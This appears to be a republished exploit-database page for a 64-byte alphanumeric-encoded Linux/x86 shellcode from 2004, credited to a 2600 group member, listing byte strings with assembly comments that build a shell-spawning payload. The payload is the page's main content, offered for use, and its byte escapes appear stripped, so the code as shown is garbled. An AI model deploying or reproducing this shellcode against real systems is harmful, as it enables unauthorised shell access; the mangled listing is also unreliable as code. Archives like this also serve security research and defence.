Linux/x86 – Alphanumeric Encoded Shellcode (64 bytes)

Linux/x86 – Alphanumeric Encoded Shellcode (64 bytes)

漏洞ID 1054838 漏洞类型
发布时间 2004-12-22 更新时间 2004-12-22
图片[1]-Linux/x86 – Alphanumeric Encoded Shellcode (64 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Alphanumeric Encoded Shellcode (64 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13418
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*--------------------------------------*/
     /*   64 byte alpha-numeric shellcode    */
     /*        by XORt@dallas_2600   64bytes */
     /*--------------------------------------*/
     "x6ax30"         /* pushb $0x30       */
     "x58"             /* pop %eax          */
     "x34x30"         /* xorb $0x30, %al   */
     "x50"             /* push %eax         */
     "x5a"             /* pop %edx          */
     "x48"             /* dec %eax          */
     "x66x35x41x30" /* xorl $0x3041, %ax */
     "x66x35x73x4f" /* xorl $0x4f73, %ax */ 
     "x50"             /* push %eax         */
     "x52"             /* pushl %edx        */
     "x58"             /* pop %eax          */
     "x684J4A"         /* pushl "4J4A"      */
     "x68PSTY"         /* pushl "PSTY"      */
     "x68UVWa"         /* pushl "UVWa"      */
     "x68QRPT"         /* pushl "QRPT"      */
     "x68PTXR"         /* pushl "PTXR"      */
     "x68binH"         /* pushl "binH"      */
     "x68IQ50"         /* pushl "IQ50"      */
     "x68shDY"         /* pushl "shDY"      */
     "x68Rha0"         /* pushl "Rha0"      */
     /*--------------------------------------*/


// milw0rm.com [2004-12-22]

相关推荐: MOD Guthabenhack For Woltlab Burning Board SQL Injection Vulnerability

MOD Guthabenhack For Woltlab Burning Board SQL Injection Vulnerability 漏洞ID 1099780 漏洞类型 Input Validation Error 发布时间 2003-07-31 更新…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享